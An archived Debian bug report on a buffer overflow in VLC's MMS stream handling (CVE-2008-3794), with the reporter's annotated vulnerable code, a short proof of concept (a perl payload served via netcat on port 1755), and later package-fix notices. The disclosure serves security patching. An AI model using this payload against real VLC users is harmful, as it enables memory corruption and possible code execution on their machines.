Debian Bug report logs - #496265
vlc: buffer overflow in mms handling

version graph

Package: vlc; Maintainer for vlc is Debian Multimedia Maintainers <pkg-multimedia-maintainers@lists.alioth.debian.org>; Source for vlc is src:vlc.

Reported by: Nico Golde <nion@debian.org>

Date: Sun, 24 Aug 2008 00:21:01 UTC

Severity: grave

Tags: security

Found in versions vlc/0.8.6.i-1, vlc/0.8.6.h-1

Fixed in versions vlc/0.8.6.h-4, vlc/0.8.6.i-2, vlc/0.8.6.h-1+lenny1

Done: Steffen Joeris <white@debian.org>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, Debian multimedia packages maintainers <pkg-multimedia-maintainers@lists.alioth.debian.org>:
Bug#496265; Package vlc. Full text and rfc822 format available.

Acknowledgement sent to Nico Golde <nion@debian.org>:
New Bug report received and forwarded. Copy sent to Debian multimedia packages maintainers <pkg-multimedia-maintainers@lists.alioth.debian.org>. Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Nico Golde <nion@debian.org>
To: submit@bugs.debian.org
Subject: vlc: buffer overflow in mms handling
Date: Sun, 24 Aug 2008 02:18:02 +0200
[Message part 1 (text/plain, inline)]
Package: vlc
Version: 0.8.6.i-1
Severity: grave
Tags: security

Hi,
the following security issue was published for vlc

static int mms_ReceiveCommand( access_t *p_access )
{
    access_sys_t *p_sys = p_access->p_sys;

    for( ;; )
    {
        int i_used;
        int i_status;

        if( NetFillBuffer( p_access ) < 0 )
        {
            msg_Warn( p_access, "cannot fill buffer" );
            return VLC_EGENERIC;
        }
        if( p_sys->i_buffer_tcp > 0 )
        {
[1]         i_status = mms_ParseCommand( p_access, p_sys->buffer_tcp,
                                         p_sys->i_buffer_tcp, &i_used );
[2]         if( i_used < MMS_BUFFER_SIZE )  
            {
[3]             memmove( p_sys->buffer_tcp, p_sys->buffer_tcp + i_used,
                         MMS_BUFFER_SIZE - i_used );    //BUG! i_used overflow

(...)

[1] - function that sets i_used to negative value, see below
[2] - i_used is signed, so predicate is true
[3] - actual overflow, we have good control over what is written

static int  mms_ParseCommand( access_t *p_access,
                              uint8_t *p_data,
                              int i_data,
                              int *pi_used )
(...)
    i_length = GetDWLE( p_data + 8 ) + 16;
(...)
    if( i_length > p_sys->i_cmd )
    {
        msg_Warn( p_access,
                  "truncated command (missing %d bytes)",
                   i_length - i_data  );
        p_sys->i_command = 0;
        return -1;
    }
[1] else if( i_length < p_sys->i_cmd )
    {
        p_sys->i_cmd = i_length;
[2]     *pi_used = i_length;
    }

(...)

[1] - predicate is true
[2] - sets i_used from mms_ReceiveCommand

- - Proof of concept -

on localhost:

perl -e 'print "aaaa\xce\xfa\x0b\xb0\xef\xff\xef\xff"; print "a"x100' > headshot
nc -l -v -p 1755 < headshot 

open this url in VLC:

mmst://127.0.0.1/


I can confirm this issue exists.
Please see http://www.orange-bat.com/adv/2008/adv.08.24.txt for the original advisory.

I'll follow up on this bug report with a CVE id soon.

Kind regards
Nico

-- 
Nico Golde - http://www.ngolde.de - nion@jabber.ccc.de - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
[Message part 2 (application/pgp-signature, inline)]

Bug marked as found in version 0.8.6.h-1. Request was from Nico Golde <nion@debian.org> to control@bugs.debian.org. (Sun, 24 Aug 2008 00:27:03 GMT) Full text and rfc822 format available.

Reply sent to Christophe Mutricy <xtophe@videolan.org>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to Nico Golde <nion@debian.org>:
Bug acknowledged by developer. Full text and rfc822 format available.

Message #12 received at 496265-close@bugs.debian.org (full text, mbox):

From: Christophe Mutricy <xtophe@videolan.org>
To: 496265-close@bugs.debian.org
Subject: Bug#496265: fixed in vlc 0.8.6.h-4
Date: Mon, 25 Aug 2008 12:02:29 +0000
Source: vlc
Source-Version: 0.8.6.h-4

We believe that the bug you reported is fixed in the latest version of
vlc, which is due to be installed in the Debian FTP archive:

libvlc0-dev_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/libvlc0-dev_0.8.6.h-4_i386.deb
libvlc0_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/libvlc0_0.8.6.h-4_i386.deb
mozilla-plugin-vlc_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/mozilla-plugin-vlc_0.8.6.h-4_i386.deb
vlc-nox_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-nox_0.8.6.h-4_i386.deb
vlc-plugin-arts_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-plugin-arts_0.8.6.h-4_i386.deb
vlc-plugin-esd_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-plugin-esd_0.8.6.h-4_i386.deb
vlc-plugin-ggi_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-plugin-ggi_0.8.6.h-4_i386.deb
vlc-plugin-glide_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-plugin-glide_0.8.6.h-4_i386.deb
vlc-plugin-jack_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-plugin-jack_0.8.6.h-4_i386.deb
vlc-plugin-sdl_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-plugin-sdl_0.8.6.h-4_i386.deb
vlc-plugin-svgalib_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc-plugin-svgalib_0.8.6.h-4_i386.deb
vlc_0.8.6.h-4.diff.gz
  to pool/main/v/vlc/vlc_0.8.6.h-4.diff.gz
vlc_0.8.6.h-4.dsc
  to pool/main/v/vlc/vlc_0.8.6.h-4.dsc
vlc_0.8.6.h-4_i386.deb
  to pool/main/v/vlc/vlc_0.8.6.h-4_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 496265@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Christophe Mutricy <xtophe@videolan.org> (supplier of updated vlc package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Mon, 25 Aug 2008 01:07:27 +0100
Source: vlc
Binary: vlc vlc-nox libvlc0 libvlc0-dev vlc-plugin-esd vlc-plugin-sdl vlc-plugin-ggi vlc-plugin-glide vlc-plugin-arts mozilla-plugin-vlc vlc-plugin-svgalib vlc-plugin-jack
Architecture: source i386
Version: 0.8.6.h-4
Distribution: unstable
Urgency: high
Maintainer: Debian multimedia packages maintainers <pkg-multimedia-maintainers@lists.alioth.debian.org>
Changed-By: Christophe Mutricy <xtophe@videolan.org>
Description: 
 libvlc0    - multimedia player and streamer library
 libvlc0-dev - development files for VLC
 mozilla-plugin-vlc - multimedia plugin for web browsers based on VLC
 vlc        - multimedia player and streamer
 vlc-nox    - multimedia player and streamer (without X support)
 vlc-plugin-arts - aRts audio output plugin for VLC
 vlc-plugin-esd - Esound audio output plugin for VLC
 vlc-plugin-ggi - GGI video output plugin for VLC
 vlc-plugin-glide - Glide video output plugin for VLC
 vlc-plugin-jack - Jack audio plugins for VLC
 vlc-plugin-sdl - SDL video and audio output plugin for VLC
 vlc-plugin-svgalib - SVGAlib video output plugin for VLC
Closes: 496265
Changes: 
 vlc (0.8.6.h-4) unstable; urgency=high
 .
   * Security: Fix integer overflow in mms module
     (Closes: #496265)(407-mms-overflow.diff taken from upstream)
Checksums-Sha1: 
 87c49e28b30660e3eda99eb9a22754f662a787b1 3078 vlc_0.8.6.h-4.dsc
 6f0a359debd01f2ee15983ef4d78f168d58a033e 43520 vlc_0.8.6.h-4.diff.gz
 0a7e0dd6df2d3510a65db65023586088a9b3dd1e 1084950 vlc_0.8.6.h-4_i386.deb
 8688e42d538b46e37d38e45887d8719e11c87d6c 4977644 vlc-nox_0.8.6.h-4_i386.deb
 ead99b6a2baaadeb81236641e542c2aaab62325d 462036 libvlc0_0.8.6.h-4_i386.deb
 439a814456fbf5096c9f97c6c66215558c068a26 478890 libvlc0-dev_0.8.6.h-4_i386.deb
 6b666b8ab68c965216037656a7b30bdaa5e38cd6 5252 vlc-plugin-esd_0.8.6.h-4_i386.deb
 fe06b921729f38e051400ae35d5918f3105cef83 11108 vlc-plugin-sdl_0.8.6.h-4_i386.deb
 5d19f2e57f20b1699325dd8cb69cd818dbf3c2f7 6126 vlc-plugin-ggi_0.8.6.h-4_i386.deb
 c5f59828cc9acfa10d21bb267ae837d6772a742b 4260 vlc-plugin-glide_0.8.6.h-4_i386.deb
 d9d5a1cfde7cf7d8a61b3c2069601f7a288000f7 4388 vlc-plugin-arts_0.8.6.h-4_i386.deb
 cc852b097347e61fd6cc166e173986e12ef50207 36986 mozilla-plugin-vlc_0.8.6.h-4_i386.deb
 9c739cd67454ab4be9884f15a26b17ef163db510 4850 vlc-plugin-svgalib_0.8.6.h-4_i386.deb
 549f98e975e2aebea09f44fffdc400c0567598e9 5154 vlc-plugin-jack_0.8.6.h-4_i386.deb
Checksums-Sha256: 
 96c216dd41129a47009450be859264369eaa2f7b35530730993ea7e4e32c7ffd 3078 vlc_0.8.6.h-4.dsc
 7857bb6d76fdc2719c616264322c9829f18e9264432c185a729abcdd4d7e1869 43520 vlc_0.8.6.h-4.diff.gz
 85ce5e74a0e43852d1bdbe4bf5bcda4293724454031c7a11878450181b6b23ef 1084950 vlc_0.8.6.h-4_i386.deb
 6bee2dc0c3d29b4ac4dd967d5dd73057d8c4b48e011f50a2e477febed3f6f219 4977644 vlc-nox_0.8.6.h-4_i386.deb
 b7c22ead5a4624af106cd1759b4adbd2ae7fbbdac2280d9edd422832b7dbc0b7 462036 libvlc0_0.8.6.h-4_i386.deb
 8e4b98bc6fcc9c1af10a4b82612a4842f5514efe8e40604c9e373bd91816e1e3 478890 libvlc0-dev_0.8.6.h-4_i386.deb
 eb67515cb7a3a39d21b8b2b5cb88d3e09f775eb6e4425398029a7556e296deba 5252 vlc-plugin-esd_0.8.6.h-4_i386.deb
 53cd1b288e6cc117884c5152db21011b9d6657dfb50612ece48cbdcb876505ea 11108 vlc-plugin-sdl_0.8.6.h-4_i386.deb
 16b734da7eec76b86684dc61d0fec44feaa62a782ace70d6f7a2fd0aff760e5f 6126 vlc-plugin-ggi_0.8.6.h-4_i386.deb
 223ad03e12fb064ec20c89ca862358ac13071cedc1ba45bbfdfdef8b0f253340 4260 vlc-plugin-glide_0.8.6.h-4_i386.deb
 12eabf31634b612269d0b528b9ef0511f1a9df1e92861068463b7d6d0944284b 4388 vlc-plugin-arts_0.8.6.h-4_i386.deb
 ff8d67da7e3196b5e5e2087e6a48d45b4745fda6b8f7deba7f1bd28518cc261e 36986 mozilla-plugin-vlc_0.8.6.h-4_i386.deb
 d33445fb15902f23b93218962b9cc30f104c9c25d1e4cf99d625de6e0b59e333 4850 vlc-plugin-svgalib_0.8.6.h-4_i386.deb
 f79f055bf093e29a9d8de6882f1482be1bd53b4b4cc9cff9fe8b7acb7c869e8c 5154 vlc-plugin-jack_0.8.6.h-4_i386.deb
Files: 
 7ec744af90ad0b5767e10cfd5e809195 3078 graphics optional vlc_0.8.6.h-4.dsc
 b600267ce45934434e363fc7706acecc 43520 graphics optional vlc_0.8.6.h-4.diff.gz
 72446cf1099c82e3f2f837c139345f61 1084950 graphics optional vlc_0.8.6.h-4_i386.deb
 cbedfff946d9ddf9d7f2bbe4009a1f14 4977644 net optional vlc-nox_0.8.6.h-4_i386.deb
 8763bf84ae4f05c50e5b8433a1388e68 462036 libs optional libvlc0_0.8.6.h-4_i386.deb
 eb8e3b32c8632e5644d31a4b21cb7b66 478890 libdevel optional libvlc0-dev_0.8.6.h-4_i386.deb
 5523f63affba2463fdc44c9b6f566ee7 5252 graphics optional vlc-plugin-esd_0.8.6.h-4_i386.deb
 5a42bf695d6929cb1931b97df20d9585 11108 graphics optional vlc-plugin-sdl_0.8.6.h-4_i386.deb
 6aa646b57c84cee041a48bd16aa7adb7 6126 graphics optional vlc-plugin-ggi_0.8.6.h-4_i386.deb
 58b721b6199edbd9f6d77d32ae689561 4260 graphics optional vlc-plugin-glide_0.8.6.h-4_i386.deb
 c2e312f012dea07a6cc901a0cfffd2bc 4388 graphics optional vlc-plugin-arts_0.8.6.h-4_i386.deb
 57c99fe6433509d484b1d9511f9d82ae 36986 graphics optional mozilla-plugin-vlc_0.8.6.h-4_i386.deb
 a1fe89726918e5ed7d7a58b47d599609 4850 graphics optional vlc-plugin-svgalib_0.8.6.h-4_i386.deb
 ae389a014d6da56487d691695077a151 5154 graphics optional vlc-plugin-jack_0.8.6.h-4_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Debian Powered!

iEYEARECAAYFAkiynk0ACgkQmAg1RJRTSKSm7ACeLYWR5gz5wxY7YF0Ql5/iK3SD
YywAnjMgNxC1/cPzEadaidIevDQoYv58
=NaMd
-----END PGP SIGNATURE-----





Reply sent to Sam Hocevar (Debian packages) <sam+deb@zoy.org>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to Nico Golde <nion@debian.org>:
Bug acknowledged by developer. Full text and rfc822 format available.

Message #17 received at 496265-close@bugs.debian.org (full text, mbox):

From: Sam Hocevar (Debian packages) <sam+deb@zoy.org>
To: 496265-close@bugs.debian.org
Subject: Bug#496265: fixed in vlc 0.8.6.i-2
Date: Wed, 27 Aug 2008 09:47:13 +0000
Source: vlc
Source-Version: 0.8.6.i-2

We believe that the bug you reported is fixed in the latest version of
vlc, which is due to be installed in the Debian FTP archive:

libvlc0-dev_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/libvlc0-dev_0.8.6.i-2_amd64.deb
libvlc0_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/libvlc0_0.8.6.i-2_amd64.deb
mozilla-plugin-vlc_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/mozilla-plugin-vlc_0.8.6.i-2_amd64.deb
vlc-nox_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc-nox_0.8.6.i-2_amd64.deb
vlc-plugin-arts_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc-plugin-arts_0.8.6.i-2_amd64.deb
vlc-plugin-esd_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc-plugin-esd_0.8.6.i-2_amd64.deb
vlc-plugin-ggi_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc-plugin-ggi_0.8.6.i-2_amd64.deb
vlc-plugin-jack_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc-plugin-jack_0.8.6.i-2_amd64.deb
vlc-plugin-sdl_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc-plugin-sdl_0.8.6.i-2_amd64.deb
vlc-plugin-svgalib_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc-plugin-svgalib_0.8.6.i-2_amd64.deb
vlc_0.8.6.i-2.diff.gz
  to pool/main/v/vlc/vlc_0.8.6.i-2.diff.gz
vlc_0.8.6.i-2.dsc
  to pool/main/v/vlc/vlc_0.8.6.i-2.dsc
vlc_0.8.6.i-2_amd64.deb
  to pool/main/v/vlc/vlc_0.8.6.i-2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 496265@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Sam Hocevar (Debian packages) <sam+deb@zoy.org> (supplier of updated vlc package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Tue, 26 Aug 2008 23:25:13 +0000
Source: vlc
Binary: vlc vlc-nox libvlc0 libvlc0-dev vlc-plugin-esd vlc-plugin-sdl vlc-plugin-ggi vlc-plugin-glide vlc-plugin-arts mozilla-plugin-vlc vlc-plugin-svgalib vlc-plugin-jack
Architecture: source amd64
Version: 0.8.6.i-2
Distribution: experimental
Urgency: high
Maintainer: Debian multimedia packages maintainers <pkg-multimedia-maintainers@lists.alioth.debian.org>
Changed-By: Sam Hocevar (Debian packages) <sam+deb@zoy.org>
Description: 
 libvlc0    - multimedia player and streamer library
 libvlc0-dev - development files for VLC
 mozilla-plugin-vlc - multimedia plugin for web browsers based on VLC
 vlc        - multimedia player and streamer
 vlc-nox    - multimedia player and streamer (without X support)
 vlc-plugin-arts - aRts audio output plugin for VLC
 vlc-plugin-esd - Esound audio output plugin for VLC
 vlc-plugin-ggi - GGI video output plugin for VLC
 vlc-plugin-glide - Glide video output plugin for VLC
 vlc-plugin-jack - Jack audio plugins for VLC
 vlc-plugin-sdl - SDL video and audio output plugin for VLC
 vlc-plugin-svgalib - SVGAlib video output plugin for VLC
Closes: 496265
Changes: 
 vlc (0.8.6.i-2) experimental; urgency=high
 .
   [ Loic Minier ]
   * Fix changelog entries for 0.8.6.h-2 and 0.8.6.h-3.
   * Bump up Standards-Version to 3.8.0.
 .
   [ Christophe Mutricy ]
   * Security: Fix integer overflow in mms module (CVE-2008-3794)
     (Closes: #496265)(407-mms-overflow.diff taken from upstream)
 .
   [ Sam Hocevar ]
   * debian/patches/300_manpage_syntax.diff: fix vlc-config.1 syntax.
Checksums-Sha1: 
 6ce41230b85bade483df7ee3b7e5b9a0c3fb22f2 3053 vlc_0.8.6.i-2.dsc
 fb46ba02378bb76212e544a7b9ff8016743f4b24 41590 vlc_0.8.6.i-2.diff.gz
 15c152a6012f45e0bd328186d5bd99df00ba4d37 1102526 vlc_0.8.6.i-2_amd64.deb
 e7fc90fb76b92079bab8fa6cda8616c596d9fcbb 4962976 vlc-nox_0.8.6.i-2_amd64.deb
 8f7bf99438823c72eef11e8d1bf8e4b466a1c465 464238 libvlc0_0.8.6.i-2_amd64.deb
 e64fbde1b3f4f5a06970f00afcee6f4224f5254b 501438 libvlc0-dev_0.8.6.i-2_amd64.deb
 7a3b1e996edb12b1e2431867da729f368026dd6c 4526 vlc-plugin-esd_0.8.6.i-2_amd64.deb
 e250288acb3bb744672d79eb30b54f600e204da7 11680 vlc-plugin-sdl_0.8.6.i-2_amd64.deb
 252a78ad8775731b98c0229da476fcf6b53c62db 6178 vlc-plugin-ggi_0.8.6.i-2_amd64.deb
 379ed8f013cf4494a3cb51faa2096866857aa92a 4172 vlc-plugin-arts_0.8.6.i-2_amd64.deb
 27cba01a90a8f31a0ccde3a4ca651f40aae398cc 37362 mozilla-plugin-vlc_0.8.6.i-2_amd64.deb
 552b5b988c4fecef16f7751ec8f702786e0f3857 4758 vlc-plugin-svgalib_0.8.6.i-2_amd64.deb
 e862fd9b83940854fb644cabe575435a077c4bac 4932 vlc-plugin-jack_0.8.6.i-2_amd64.deb
Checksums-Sha256: 
 581cdd58a6ee198bf9019950d5c3baa971e0f3dc17fe045ac001958022ec3b23 3053 vlc_0.8.6.i-2.dsc
 725a91468fd18b04af6f974c54aff095907bf34278bd9e0e52cd2317601526d7 41590 vlc_0.8.6.i-2.diff.gz
 55cfdfe0edcc4a88c3708ab44ac30f6cedf70a60769cf67006a7591e8947f891 1102526 vlc_0.8.6.i-2_amd64.deb
 9dba971b25565ce4e24b37c720a595230d3101485b0dbdef7b3cb943df640879 4962976 vlc-nox_0.8.6.i-2_amd64.deb
 2f877723c444dd530705be40acd7f53883ac4eb2e299bc6bd6ac19e18ea1102a 464238 libvlc0_0.8.6.i-2_amd64.deb
 eacfecf0a7ea8541f58f575a1f8e572e4a582f7ea3b15486854908717a011e24 501438 libvlc0-dev_0.8.6.i-2_amd64.deb
 263cc9aad3a6ce8ec2b163c711ec8295ae40e19a11dc54be4b1b29d11ccb8c0f 4526 vlc-plugin-esd_0.8.6.i-2_amd64.deb
 70de28056245a4abed8c16b2002e433c4f0442233e60d69e8430eea2f8ba0dff 11680 vlc-plugin-sdl_0.8.6.i-2_amd64.deb
 010bdd14c36b99ade3226eece0ba6b5ebdc3c0e31f9bb89373924f1d8b6cb299 6178 vlc-plugin-ggi_0.8.6.i-2_amd64.deb
 ca1846d9697c92c888f94df023e60f51eb8daabb4c5ed88e2505382be4e9f13c 4172 vlc-plugin-arts_0.8.6.i-2_amd64.deb
 aa3c8b70078adbcbb40dbb67a92f9f4310a69ee04044e8f8bdf28ece4fc3a44b 37362 mozilla-plugin-vlc_0.8.6.i-2_amd64.deb
 a7425191b06c2def81d3c0a9e2a4923369b964cd0fabdd2f163fbf47ec1b0c22 4758 vlc-plugin-svgalib_0.8.6.i-2_amd64.deb
 8da779e07e39268b0c2e9993bd0fedfe9fe71d5acb03049b71cbd8171da3cab8 4932 vlc-plugin-jack_0.8.6.i-2_amd64.deb
Files: 
 dd7c02d8cd97e974a0f44c5349089bd5 3053 graphics optional vlc_0.8.6.i-2.dsc
 4ea59a106261082284cf3c96e0280bcb 41590 graphics optional vlc_0.8.6.i-2.diff.gz
 74c76d66a462d8ceaf91cdebb922579b 1102526 graphics optional vlc_0.8.6.i-2_amd64.deb
 3539915e8c0f8646304393521578da52 4962976 net optional vlc-nox_0.8.6.i-2_amd64.deb
 71569170cfa7c9e001d39953f128ffd4 464238 libs optional libvlc0_0.8.6.i-2_amd64.deb
 52ae490cb3a7340da9c5e21f76dc06bd 501438 libdevel optional libvlc0-dev_0.8.6.i-2_amd64.deb
 f593434b22807e62ffe9a32c8385ca46 4526 graphics optional vlc-plugin-esd_0.8.6.i-2_amd64.deb
 a138f20aa47e542809507fade0e96fe2 11680 graphics optional vlc-plugin-sdl_0.8.6.i-2_amd64.deb
 e3623188392f573e25da31edb974dfc9 6178 graphics optional vlc-plugin-ggi_0.8.6.i-2_amd64.deb
 58adfd3cae2f7d57addd5bc7f00b6341 4172 graphics optional vlc-plugin-arts_0.8.6.i-2_amd64.deb
 a5dec890b8d86bca13a21df588e0e498 37362 graphics optional mozilla-plugin-vlc_0.8.6.i-2_amd64.deb
 6b1f3cbf95b2d81057cee9e16113d88f 4758 graphics optional vlc-plugin-svgalib_0.8.6.i-2_amd64.deb
 aef2c31effd382c35a79b5c71959787c 4932 graphics optional vlc-plugin-jack_0.8.6.i-2_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEUEARECAAYFAki0m18ACgkQfPP1rylJn2GCNwCXZvEAHX/+GcnmHdxFhm0Vh103
/wCglAPJpSK6Ce84z8zJKFX3onttt4g=
=WsNO
-----END PGP SIGNATURE-----





Reply sent to Steffen Joeris <white@debian.org>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to Nico Golde <nion@debian.org>:
Bug acknowledged by developer. Full text and rfc822 format available.

Message #22 received at 496265-close@bugs.debian.org (full text, mbox):

From: Steffen Joeris <white@debian.org>
To: 496265-close@bugs.debian.org
Subject: Bug#496265: fixed in vlc 0.8.6.h-1+lenny1
Date: Mon, 15 Sep 2008 16:17:14 +0000
Source: vlc
Source-Version: 0.8.6.h-1+lenny1

We believe that the bug you reported is fixed in the latest version of
vlc, which is due to be installed in the Debian FTP archive:

libvlc0-dev_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/libvlc0-dev_0.8.6.h-1+lenny1_i386.deb
libvlc0_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/libvlc0_0.8.6.h-1+lenny1_i386.deb
mozilla-plugin-vlc_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/mozilla-plugin-vlc_0.8.6.h-1+lenny1_i386.deb
vlc-nox_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/vlc-nox_0.8.6.h-1+lenny1_i386.deb
vlc-plugin-arts_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/vlc-plugin-arts_0.8.6.h-1+lenny1_i386.deb
vlc-plugin-esd_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/vlc-plugin-esd_0.8.6.h-1+lenny1_i386.deb
vlc-plugin-ggi_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/vlc-plugin-ggi_0.8.6.h-1+lenny1_i386.deb
vlc-plugin-glide_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/vlc-plugin-glide_0.8.6.h-1+lenny1_i386.deb
vlc-plugin-jack_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/vlc-plugin-jack_0.8.6.h-1+lenny1_i386.deb
vlc-plugin-sdl_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/vlc-plugin-sdl_0.8.6.h-1+lenny1_i386.deb
vlc-plugin-svgalib_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/vlc-plugin-svgalib_0.8.6.h-1+lenny1_i386.deb
vlc_0.8.6.h-1+lenny1.diff.gz
  to pool/main/v/vlc/vlc_0.8.6.h-1+lenny1.diff.gz
vlc_0.8.6.h-1+lenny1.dsc
  to pool/main/v/vlc/vlc_0.8.6.h-1+lenny1.dsc
vlc_0.8.6.h-1+lenny1_i386.deb
  to pool/main/v/vlc/vlc_0.8.6.h-1+lenny1_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 496265@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Steffen Joeris <white@debian.org> (supplier of updated vlc package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Sun, 14 Sep 2008 11:18:40 +0000
Source: vlc
Binary: vlc vlc-nox libvlc0 libvlc0-dev vlc-plugin-esd vlc-plugin-sdl vlc-plugin-ggi vlc-plugin-glide vlc-plugin-arts mozilla-plugin-vlc vlc-plugin-svgalib vlc-plugin-jack
Architecture: source i386
Version: 0.8.6.h-1+lenny1
Distribution: testing-security
Urgency: high
Maintainer: Debian multimedia packages maintainers <pkg-multimedia-maintainers@lists.alioth.debian.org>
Changed-By: Steffen Joeris <white@debian.org>
Description: 
 libvlc0    - multimedia player and streamer library
 libvlc0-dev - development files for VLC
 mozilla-plugin-vlc - multimedia plugin for web browsers based on VLC
 vlc        - multimedia player and streamer
 vlc-nox    - multimedia player and streamer (without X support)
 vlc-plugin-arts - aRts audio output plugin for VLC
 vlc-plugin-esd - Esound audio output plugin for VLC
 vlc-plugin-ggi - GGI video output plugin for VLC
 vlc-plugin-glide - Glide video output plugin for VLC
 vlc-plugin-jack - Jack audio plugins for VLC
 vlc-plugin-sdl - SDL video and audio output plugin for VLC
 vlc-plugin-svgalib - SVGAlib video output plugin for VLC
Closes: 496265
Changes: 
 vlc (0.8.6.h-1+lenny1) testing-security; urgency=high
 .
   * Non-maintainer upload by the security team
   * Fix integer overflow in the mms module (Closes: #496265)
     Fixes: CVE-2008-3794
   * Fix integer overflow in the TTA module
     Fixes: CVE-2008-3732
   * Change build-depends to libdc1394-22-dev to let it build on lenny
Checksums-Sha1: 
 f16fcac0aaa7f7193cf4b0f77166c5c474fbd34e 3081 vlc_0.8.6.h-1+lenny1.dsc
 829b2599a9188254d1c109be377b4a9c18e14482 16977154 vlc_0.8.6.h.orig.tar.gz
 80008801b7273fa3508b43dd1142bdb8904f8cec 42849 vlc_0.8.6.h-1+lenny1.diff.gz
 3de7424b93cef51948bfc66afcb4d37ec0c4e4d0 1083962 vlc_0.8.6.h-1+lenny1_i386.deb
 f1db92d4a7cf3297524ddd5b59a340c34d7cfa4a 4994140 vlc-nox_0.8.6.h-1+lenny1_i386.deb
 1945ccb0c061149f19916f4c3fec7b74e0112eab 461398 libvlc0_0.8.6.h-1+lenny1_i386.deb
 d51b20e764c0bb8ec99cf4ed4c7b34af4813d99b 479384 libvlc0-dev_0.8.6.h-1+lenny1_i386.deb
 4309bca18390d6e8d95deda5178b15fc41d35ba0 5264 vlc-plugin-esd_0.8.6.h-1+lenny1_i386.deb
 65ebb0c4944608ee6be0c071615883a10ee37c82 11112 vlc-plugin-sdl_0.8.6.h-1+lenny1_i386.deb
 213296b6d44f7f9a9735a662aaad1b59fbc9b7b5 6132 vlc-plugin-ggi_0.8.6.h-1+lenny1_i386.deb
 bf37c92525f90e4286b25cd6ab97ca0ce056edc6 4268 vlc-plugin-glide_0.8.6.h-1+lenny1_i386.deb
 ab93e67c81d08421b91731aa7065073bcf8c3af1 4394 vlc-plugin-arts_0.8.6.h-1+lenny1_i386.deb
 46c21e38b43be33ba930e0d29fa16706efa67ef5 36996 mozilla-plugin-vlc_0.8.6.h-1+lenny1_i386.deb
 e0b47d914055407b372569f070d27a9ff0f74845 4866 vlc-plugin-svgalib_0.8.6.h-1+lenny1_i386.deb
 bf729a79bec7807f08ef58988f7561da69833129 5164 vlc-plugin-jack_0.8.6.h-1+lenny1_i386.deb
Checksums-Sha256: 
 47bbbe7b904641255b43e84216f787444c4c34aca5d3b26f08151bccad17c0b6 3081 vlc_0.8.6.h-1+lenny1.dsc
 92a998f2ca53b77610c608436b2e8d991442742f25793c136cb4ee095eec1eff 16977154 vlc_0.8.6.h.orig.tar.gz
 2261fe7380c03956f462f43dfd0844b35204912d1a1739a137dabfbfcefaf953 42849 vlc_0.8.6.h-1+lenny1.diff.gz
 35bd55d0bc820069f1187d7843a3a61383f7845e741acb1b9e00eaadc7031e47 1083962 vlc_0.8.6.h-1+lenny1_i386.deb
 393a44686549dc8272943b6b6fd496bf07998b0d4185f82d4d3eb5c946be6b1e 4994140 vlc-nox_0.8.6.h-1+lenny1_i386.deb
